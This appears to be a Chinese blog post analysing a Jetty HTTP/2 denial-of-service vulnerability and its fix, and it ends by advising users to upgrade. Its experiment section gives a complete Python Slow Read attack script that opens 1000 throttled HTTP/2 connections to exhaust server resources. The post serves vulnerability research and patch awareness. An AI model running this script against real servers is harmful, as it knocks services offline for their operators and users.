Jetty HTTP2.0 DoS漏洞分析

梦里梦外; 2023-10-10 18:14 15阅读 0赞

### 背景 ###

Tomcat和Jetty都是被广泛用于项目的开源Servlet容器。本文不会阐述Tomcat和Jetty之间的区别，感兴趣的同学可以自行学习相关内容。

Jetty团队去年在github issues中爆出了一个可能被DoS攻击的中级漏洞。[github.com/eclipse/jet…][github.com_eclipse_jet]

大致是，在Jetty容器引用http2-server组件开启HTTP2.0功能后，同时开发者提供了使用HTTP2.0协议服务接口。访问非正常URL时，攻击者可以通过耗尽TCP滑动窗口或HTTP2.0流控来达到耗尽Jetty服务器资源，从而达到DoS攻击效果。噢吼，这不就是HTTP慢速攻击吗。下面我们先来介绍一下HTTP慢速攻击，再来分析Jetty有漏洞的源码，之后我们做个实验来验证一下这个漏洞。

### HTTP慢速攻击 ###

HTTP慢速攻击是应用层DoS攻击的一种。由Web安全专家RSnake在2009年提出的一种攻击方式，其原理是以极低速度向服务器发送HTTP请求，服务器有并发数限制。一旦这些恶意链接不释放，同时不停的创建新的恶意链接就会导致服务器资源被耗尽。

HTTP慢速攻击一共有3种

Slow Header攻击

Slow Header攻击利用HTTP 请求头设计。众所周知HTTP Header是文本信息。每个属性，比如Content-Type: text/plain都是由"\\r\\n"来进行分隔的。最后一个属性后面会拼接"\\r\\n\\r\\n"来告知服务器请求头已传输完毕，请处理我的请求。攻击者利用这个设计，永远不传"\\r\\n\\r\\n"，同时，我们也知道HTTP服务器在没有接收到完整的请求头是不会处理请求的。这时，服务器就不得不一直维持着链接。一旦存在大量这种链接，就会导致服务器资源被耗尽。新的请求无法处理。

Slow POST攻击

攻击者将Content-Length设置为一个很大的值，但是却用非常慢的速度来发送数据。这就会导致服务器一直维护着链接，大量此类型连接就会导致服务器资源耗尽。

Slow Read攻击

利用TCP滑动窗口机制，攻击者将客户端内核读缓冲区设置的非常小。同时，用非常慢的速率将内核读缓冲区的数据拷贝到用户进程缓冲区。这时，服务器端就会收到客户端发来的ZeroWindow消息，让服务器端以为客户端非常忙碌无法处理发来的Response消息。服务器不得不维持着连接。大量此链接的存在就会导致服务器资源消耗殆尽。

### 漏洞源码 ###

首先贴上Jetty团队修复漏洞的PR链接[github.com/eclipse/jet…][github.com_eclipse_jet 1]

![format_png][]

这个漏洞存在HttpChannelOverHTTP2.java 的OnRequest和OnPush方法中（OnPush为HTTP2.0特有的服务端推送功能）。我们继续看看OnBadMessage是干什么的。为什么不返回NULL了，而是直接返回一个Runnable对象？

![format_png 1][]

OnBadMessage是在处理请求时出现异常时，向客户端返回错误信息用的。OnBadMessage与OnRequest是在同一个线程上下文。一旦攻击者使用Slow Read来攻击，就会导致jetty的 worker selector线程被阻塞（jetty底层使用的是netty框架）。所以，为了防止阻塞worker线程，jetty团队直接返回一个Runnable对象将它丢到任务队列中，释放线程来处理新的请求。

### 实验 ###

目前，大多数的HTTP慢速攻击工具，比如基于C++的slowhttptest都不支持HTTP2.0协议。没关系我们可以手搓一个。

注意！！！目前大多数支持HTTP2.0 协议的Servelt容器都要求配置TLS链接。在TLS握手的ALPN（应用协议协商）阶段，客户端和服务器端会达成使用哪种HTTP协议的约定。虽然HTTP2.0协议没有强制要求必须进行TLS握手，但是，使用Jetty HTTP2.0功能必须配置TLS。

#### 攻击脚本 ####

使用Python搓一个Slow Read攻击脚本, 使用h2 HTTP2.0客户端库

（**在此声明，工具仅提供研究漏洞使用。用于其他目的造成的影响，后果自负，作者概不负责**）

ini

复制代码

`import socket import ssl import time import h2.connection import h2.events from concurrent.futures import ThreadPoolExecutor def attack(ip: str, port: int, url: str): try: # 设置TLS ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE ctx.set_alpn_protocols(['h2']) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 将内核读缓冲区设置为128bytes s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128) s.settimeout(1200) s = ctx.wrap_socket(s, server_hostname=ip) s.connect((ip, port)) # 设置HTTP2.0 c = h2.connection.H2Connection() c.initiate_connection() s.sendall(c.data_to_send()) except Exception as e: print(e) return # HTTP2.0请求头与HTTP/1稍有不同 headers = [ (':method', 'GET'), (':path', url), (':authority', ip), (':scheme', 'https'), ('keep-alive', 'timeout=5000, max=5000') ] c.send_headers(1, headers, end_stream=True) s.sendall(c.data_to_send()) resp_stream_end = False while not resp_stream_end: # 每次只从内核读缓冲区读取1byte data = s.recv(1) if not data: break events = c.receive_data(data) for event in events: if isinstance(event, h2.events.StreamEnded): resp_stream_end = True break # 每读一个字节，线程休眠15s time.sleep(15) c.close_connection() s.sendall(c.data_to_send()) s.close() if __name__ == '__main__': # 创建1000个发送invalid URL的连接 with ThreadPoolExecutor(max_workers=1000) as pool: for i in range(0, 1000): pool.submit(attack, ip, port, invalid_url)`

#### 服务器端 ####

服务器端我们使用spring-boot-starter-web，排除Tomcat使用Jetty内嵌式容器。

xml

复制代码

`<dependencies> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-web</artifactId> <version>3.0.4</version> <exclusions> <exclusion> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-tomcat</artifactId> </exclusion> </exclusions> </dependency> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-jetty</artifactId> <version>2.6.6</version> </dependency> <dependency> <groupId>org.eclipse.jetty</groupId> <artifactId>jetty-alpn-conscrypt-server</artifactId> <version>9.4.15.v20190215</version> </dependency> <dependency> <groupId>org.eclipse.jetty.http2</groupId> <artifactId>http2-server</artifactId> <version>9.4.15.v20190215</version> </dependency> </dependencies>`

配置文件中要开启TLS和http2功能

yaml

复制代码

`ssl: key-store: classpath:cert.jks key-password: 123456 http2: enabled: true`

随意写一个Controller类。

可以看到在没有攻击前，请求是正常的，而且协议使用的是h2, 也就是http2.0

![format_png 2][]

**攻击开始**

通过wireshake抓包可以看到客户端向服务器端发送ZeroWindow 探针。Slow Read 攻击出现

![format_png 3][]

攻击结束后，服务已经无法访问

![format_png 4][]

此时通过lsof命令可以看到，jetty在DoS攻击后未能回收连接资源。文件句柄数为548，已经超过512的限制。已经无法再处理新的请求，只能重启服务。DoS攻击成功。

![format_png 5][]

### 总结 ###

漏洞出现的Jetty版本是9.4.46，理论上小于该版本的Jetty在使用HTTP2.0协议功能的时候都可能会受到DoS攻击。Jetty团队已修复该漏洞。所以，如果使用还在使用低版本Jetty的同学建议升级。

作者：CrabGeek  
链接：https://juejin.cn/post/7233409321340715067

[github.com_eclipse_jet]: https://link.juejin.cn?target=https%3A%2F%2Fgithub.com%2Feclipse%2Fjetty.project%2Fsecurity%2Fadvisories%2FGHSA-wgmr-mf83-7x4j
[github.com_eclipse_jet 1]: https://link.juejin.cn?target=https%3A%2F%2Fgithub.com%2Feclipse%2Fjetty.project%2Fpull%2F7938%2Ffiles
[format_png]: https://img-blog.csdnimg.cn/img_convert/54097e0c2a92c3da409f195feebcfda4.webp?x-oss-process=image/format,png
[format_png 1]: https://img-blog.csdnimg.cn/img_convert/d67e09af51c0a506caa50f4f0d3a3b44.webp?x-oss-process=image/format,png
[format_png 2]: https://img-blog.csdnimg.cn/img_convert/eca62d03ec2b451f9bb0994b8e5a70ca.webp?x-oss-process=image/format,png
[format_png 3]: https://img-blog.csdnimg.cn/img_convert/82ddf8c137b3401a65e5ddb8a916b190.webp?x-oss-process=image/format,png
[format_png 4]: https://img-blog.csdnimg.cn/img_convert/6446b413ef2a700057098d4d3d9b8b66.webp?x-oss-process=image/format,png
[format_png 5]: https://img-blog.csdnimg.cn/img_convert/99ffefd0857562c17c9f41e2bbe28e3e.webp?x-oss-process=image/format,png